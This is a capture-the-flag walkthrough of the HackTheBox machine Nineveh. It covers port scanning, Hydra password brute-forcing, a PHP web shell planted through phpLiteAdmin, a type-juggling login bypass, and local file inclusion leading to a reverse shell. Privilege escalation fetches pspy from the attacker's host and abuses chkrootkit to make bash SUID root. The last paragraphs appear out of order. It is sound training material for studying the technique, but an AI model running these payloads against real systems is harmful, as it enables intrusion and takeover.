As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Sun Sep 4 12:51:17 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.10.43
Nmap scan report for 10.10.10.43
Host is up (0.053s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
443/tcp open https
# Nmap done at Sun Sep 4 12:51:43 2022 -- 1 IP address (1 host up) scanned in 26.70 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p80,443 10.10.10.43 -oN targeted
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.92 scan initiated Sun Sep 4 12:51:59 2022 as: nmap -sCV -p80,443 -oN targeted 10.10.10.43
Nmap scan report for 10.10.10.43
Host is up (0.059s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn`t have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after: 2018-07-01T15:03:30
|_http-title: Site doesn't have a title (text/html).
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Sep 4 12:52:19 2022 -- 1 IP address (1 host up) scanned in 19.62 seconds
As we can see in the nmap report, there is a domain name. Let's add it to the /etc/hosts file.
-t number of current threads, in this case 200 threads.
-x file extensions to search for.
-k skip TLS certificate verification.
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-04 17:22:40
[DATA] max 16 tasks per 1 server, overall 16 tasks, 399 login tries (l:1/p:399), ~25 tries per task
[DATA] attacking http-post-forms://10.10.10.43:443/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password.
[443][http-post-form] host: 10.10.10.43 login: admin password: password123
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-04 17:23:01
Now we know the password is password123, let's log in.
Then, select the new database. As we can see, the file is located in /var/tmp/rce.php.
And create a new table with one field.
The type of the column should set to TEXT, and the default value should be set to <?php system($_GET['cmd'])?>.
Now the table is created, but we have to find a way of accessing it, so we can execute commands.
If we try to log in as the test user in the /department page, we'll get an error saying invalid username.
As we saw in the SSL certificate, it is signed as the admin@nineveh.htb user. We could try to log in as the admin user in the /department login page.
We get the message Invalid Password! which means that admin is a valid user. At this point, I intercepted the login request with BurpSuite, and tried to do a Type Juggling attack.
Type Juggling vulnerabilities are a class of vulnerability wherein an object is initialized or accessed as the incorrect type, allowing an attacker to potentially bypass authentication or undermine the type safety of an application, possibly leading to arbitrary code execution.
If we modify the login request and change the current payload.
username=admin&password=test
To the following one.
username=admin&password[]=
We should bypass the login panel.
If we go to the Notes section, we'll see a note from the amrois user. Note the URL.
I tried to do a Local File Inclusion attack in the notes GET parameter, trying to import the /etc/passwd file. And the following parameter seems to work.
Now, we can access the database PHP file we created earlier, which is located in /var/tmp/rce.php. And we can execute commands with the cmd parameter as the www-data user.
listening on [any] 4444 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.43] 50608
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
Privilege Escalation
First, let's set an interactive TTY shell.
script /dev/null -c /bin/bash
Then I press Ctrl+Z and execute the following command on my local machine:
stty raw -echo; fg
reset
Terminal type? xterm
Next, I export a few variables:
export TERM=xterm
export SHELL=bash
Finally, I run the following command in our local machine:
stty size
51 236
And set the proper dimensions in the victim machine:
stty rows 51 columns 236
If check in the /var/www/ssl/secure_notes/ directory, we'll see an image which weights a lot.
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
Let's copy the key into the /tmp/id_rsa file, and give it the right permissions.
nano /tmp/id_rsa
chmod 600 /tmp/id_rsa
Now we can log in as the amrois user via SSH, and we'll be able to grab the user flag.
ssh -i /tmp/id_rsa amrois@127.0.0.1
Could not create directory '/var/www/.ssh'.
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:aWXPsULnr55BcRUl/zX0n4gfJy5fg29KkuvnADFyMvk.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
Ubuntu 16.04.2 LTS
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
288 packages can be updated.
207 updates are security updates.
You have mail.
Last login: Mon Jul 3 00:19:59 2017 from 192.168.0.14
amrois@nineveh:~$ whoami
amrois
amrois@nineveh:~$ cat user.txt
5816329477ff124a3935faa4563d2035
pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute.
python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
On the time machine, go to the /tmp directory, download the binary, and give it execution permissions.
cd /tmp
wget http://10.10.14.2:8000/pspy64
chmod +x pspy64
If we execute the tool, we'll see at some point that the root user, with the UID set to 0, is executing the /usr/bin/chkrootkit binary.
Now, let's wait until the /bin/bash binary has the SUID permission set, and then all we have to do is execute bash with root permissions, and reap the harvest and take the root flag.
At this point, I look for ways of getting a Remote Code Execution on the machine, and I found this GitHub which explains how to do it. First, let's create a new database with the .php extension.
At this point, I tried to look for scheduled tasks on the system with the pspy tool. Let's transfer to the nineveh machine.
We can see in that there is a abusing this binary. First, let's create a file in the /tmp directory called update, which will give the /bin/bash binary the SUID permission.
